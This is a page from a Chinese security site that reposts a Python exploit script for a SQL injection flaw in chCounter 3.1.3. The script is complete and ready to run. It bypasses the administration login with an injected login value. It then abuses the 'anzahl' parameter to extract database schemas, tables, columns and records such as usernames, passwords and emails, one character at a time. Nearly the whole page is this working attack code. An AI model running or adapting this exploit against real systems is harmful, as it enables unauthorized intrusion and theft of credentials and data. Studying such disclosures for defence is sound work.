首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
chCounter <= 3.1.3 SQL Injection Vulnerability
来源:mfontanini@cert.unlp.edu.ar 作者:Fontanini 发布时间:2010-11-19  

#!/usr/bin/python
#
# Exploit Title: chCounter <= 3.1.3 SQLInjection
# Date: 2010/11/18
# Author: Matias Fontanini(mfontanini@cert.unlp.edu.ar).
# Software Link: http://chcounter.org/chCounter3/getfile.php?id=5
# Version: 3.1.3
# Tested on: Ubuntu Server 10.04 with apache
#
# Requirements:
# - Downloads must be enabled(this is not default).
# - magic_quotes off.
# - Access to administration site(can be bypassed if magic_quotes off)
#
# =SQLInjection=
# Location: administration/index.php?cat=downloads&edit=
# Affected parameters: anzahl
# Method: POST
# Severity: High
# Description: When accessing administration/index.php?cat=downloads&edit=VALID_ID
# and using a valid download id, an attacker is able to manipulate the "anzahl"
# parameter to perform queries which only involve returning an integer. The query
# output will be sent back to the client in the "anzahl" text input.
# Exploit: An attacker could perform repeated crafted requests to retrieve any
# database records for which the user has access.

import sys
import httplib, urllib
import types

lookupString='name="anzahl" value="'

def generateHeaders(host, sessid):
    headers = {'Host':host,
            'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language':'en-us,en;q=0.5',
            'Accept-Encoding':'deflate',
            'Accept-Charset:':'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
            'Keep-Alive':'115',
            'Connection':'keep-alive',
            'Content-Type':'application/x-www-form-urlencoded',
            'Referer':'http://' + host,
            'Cookie':'PHPSESSID='+sessid}
    if sessid == '':
        del headers['Cookie']
    return headers


def loginRequest(connection, sessid, host, path):
    headers = generateHeaders(host, sessid)
    params = urllib.urlencode({'login_form':'1','login_name':'or \'=\'','login_pw':''})
    connection.request('POST', path + 'administration/index.php', params, headers)
    return connection.getresponse()


def generateSessId(connection, host, path):
    headers = generateHeaders(host, '')
    connection.request('GET', path + 'stats/online_users.php', '', headers)
    response = connection.getresponse()
    cookie = response.getheader('Set-Cookie')
    if type(cookie) is types.NoneType:
        print '[-] Could not get session id. Wrong path?'
        exit(2)
    return cookie[10:cookie.find(';')]
   
def genSessid(host, path):
    print '[+] Trying ' + host + path
    con = connectToHost(host)
    sessid = generateSessId(con, host, path)
    print '[+] Acquired PHPSESSID -> ' + sessid
    con = connectToHost(sys.argv[1])
    output = loginRequest(con, sessid, host, path).read()
    if output.find('login_name') != -1:
        print '[-] Could not bypass login'
        exit(7)
    return sessid

def guessLen(sessid, host, field, path, dId, table):
    headers = generateHeaders(host, sessid)
    connection = connectToHost(host)
    params = urllib.urlencode({'dl_id':dId,
                               'name':'test','url':'http://test.com',
                               'wert':'test',
                               'timestamp_eintrag':'2010-11-17, 15:43:00',
                               'timestamp':'2010-11-17, 15:43:00',
                               'edit_download':'Save entry',
                               'anzahl':'(select length(val) from (select '+field+' as val from '+table+') as xYsdS)'})
    connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
    response = connection.getresponse().read()
    if response.find('command denied') != -1:
        print '[-] Could not acces table. Acces denied.'
        exit(4)
    index = response.find(lookupString)
    return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))


def guessField(sessid, host, path, dId, field, table):
    sz=guessLen(sessid, host, field, path, dId, table)
    headers = generateHeaders(host, sessid)
    i=1
    while i <= sz:
        connection = connectToHost(host)
        params = urllib.urlencode({'dl_id':dId,
                                   'name':'test','url':'http://test.com',
                                   'wert':'test',
                                   'timestamp_eintrag':'2010-11-17, 15:43:00',
                                   'timestamp':'2010-11-17, 15:43:00',
                                   'edit_download':'Save entry',
                                   'anzahl':'(select ascii(substring(val,'+str(i)+',1)) from (select '+field+' as val from '+table+') as x)'})
        connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
        response = connection.getresponse().read()
        index = response.find(lookupString)
        sys.stdout.write(chr(int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))))
        sys.stdout.flush()
        i += 1


def getValidId(sessid, host, path):
    headers = generateHeaders(host, sessid)
    connection = connectToHost(host)
    connection.request('GET', path + 'administration/index.php?cat=downloads', '', headers)
    response = connection.getresponse().read()
    if response.find('ID') == -1:
        print '[-] Downloads seem to be deactivated'
        exit(6)
    index=response.find('index.php?cat=downloads&edit=')
    return int(str(response[index+len('index.php?cat=downloads&edit='):response.find('"', index+len('index.php?cat=downloads&edit='))]))

def getRowCount(sessid, host, path, dId, field, table):
    headers = generateHeaders(host, sessid)
    connection = connectToHost(host)
    params = urllib.urlencode({'dl_id':dId,
                               'name':'test','url':'http://test.com',
                               'wert':'test',
                               'timestamp_eintrag':'2010-11-17, 15:43:00',
                               'timestamp':'2010-11-17, 15:43:00',
                               'edit_download':'Save entry',
                               'anzahl':'(select count(distinct('+field+')) from '+table+')'})
    connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
    response = connection.getresponse().read()
    if response.find('command denied') != -1:
        print '[-] Could not acces table. Acces denied.'
        exit(4)
    index = response.find(lookupString)
    return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))

def getSchemas(sessid, host, path, dId): 
    rows=getRowCount(sessid, host, path, dId,'schema_name', 'information_schema.schemata')
    print '[+] Schema count: ' + str(rows)
    for i in range(0, rows):
        sys.stdout.write('[+] Table name: ')
        guessField(sessid, host, path, dId,'schema_name', 'information_schema.schemata limit 1 offset '+str(i))
        print ''

def getTables(sessid, host, path, dId): 
    rows=getRowCount(sessid, host, path, dId,'table_name', 'information_schema.tables')
    print '[+] Table count: ' + str(rows)
    for i in range(0, rows):
        sys.stdout.write('[+] Table name: ')
        guessField(sessid, host, path, dId,'table_name', 'information_schema.tables limit 1 offset '+str(i))
        print ''


def getColumns(sessid, host, path, dId, table): 
    rows=getRowCount(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\'')
    print '[+] Column count: ' + str(rows)
    for i in range(0, rows):
        sys.stdout.write('[+] Column name: ')
        guessField(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\' limit 1 offset '+str(i))
        print ''

def getItems(sessid, host, path, dId, table, columns, orderby): 
    rows=getRowCount(sessid, host, path, dId, columns[0], table)
    print '[+] Item count: ' + str(rows)
    print '[+] Dump:'
    for i in range(0, rows):
        for col in columns:
            if len(orderby):
                sys.stdout.write(' || ')
                guessField(sessid, host, path, dId, col, table+' order by ' + orderby + ' limit 1 offset '+str(i))
            else:
                sys.stdout.write(' || ')
                guessField(sessid, host, path, dId, col, table+' limit 1 offset '+str(i))
        print ' || '

def connectToHost(host):
    con = httplib.HTTPConnection(sys.argv[1], 80)
    tries=5
    recon=True
    while tries > 0 and recon == True:
        try:
            con.connect();
            recon = False
        except:
            tries -= 1
    if tries == 0:
        print '[-] Could not establish connection'
        exit(3)
    return con

def printHelp():
    print '[-] Usage ' + sys.argv[0] + ' <WEBSERVER> <PATH_TO_CHCOUNTER> <OPTION> [ARGS]'
    print '    OPTION can be:'
    print '                    -t to list all tables'
    print '                    -c <TABLE> to list all columns from table TABLE'
    print '                    -s <TABLE> to list all columns from table TABLE'
    print '                    -i <TABLE> <COLUMNS*> [ORDERBY] to list TABLE:COLUMN items.'
    print '                         COLUMNS* can be a comma-separated list of columns'
    print ''
    print '   Examples:'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -t'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -s'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -c users'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username,passwd,email'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username user_id'
    print '                       The last example outputs result ordered by user_id'
    exit(1)

if len(sys.argv) < 4:
    printHelp()

sessid = genSessid(sys.argv[1], sys.argv[2])
valId = getValidId(sessid, sys.argv[1], sys.argv[2])

if sys.argv[3] == '-t':
    getTables(sessid, sys.argv[1], sys.argv[2], valId)
    exit(0)
if sys.argv[3] == '-c':
    if len(sys.argv) < 5:
        printHelp()
    getColumns(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4])
    exit(0)
if sys.argv[3] == '-i':
    if len(sys.argv) < 6:
        printHelp()
    orderby=''
    if len(sys.argv) == 7:
        orderby = sys.argv[6]
        orderby = sys.argv[6]
    getItems(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4], sys.argv[5].split(','), orderby)
    exit(0)
if sys.argv[3] == '-s':
    if len(sys.argv) < 4:
        printHelp()
    getSchemas(sessid, sys.argv[1], sys.argv[2], valId)
    exit(0)

   


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DIZzy 1.12 Local Stack Overflo
·MP3-Nator Buffer Overflow (SEH
·Mosets Tree 2.1.6 (Joomla) Tem
·Trend Micro Internet Security
·DATAC RealWin SCADA Server Buf
·Xion Audio Player 1.0.126 Buff
·NetWare 6.5 SunRPC Portmapper
·FreeNAS exec_raw.php Arbitrary
·Axis2 / SAP BusinessObjects ds
·Safari 5.02 Stack Overflow Den
·Native Instruments Kontakt 4 P
·Native Instruments Traktor Pro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved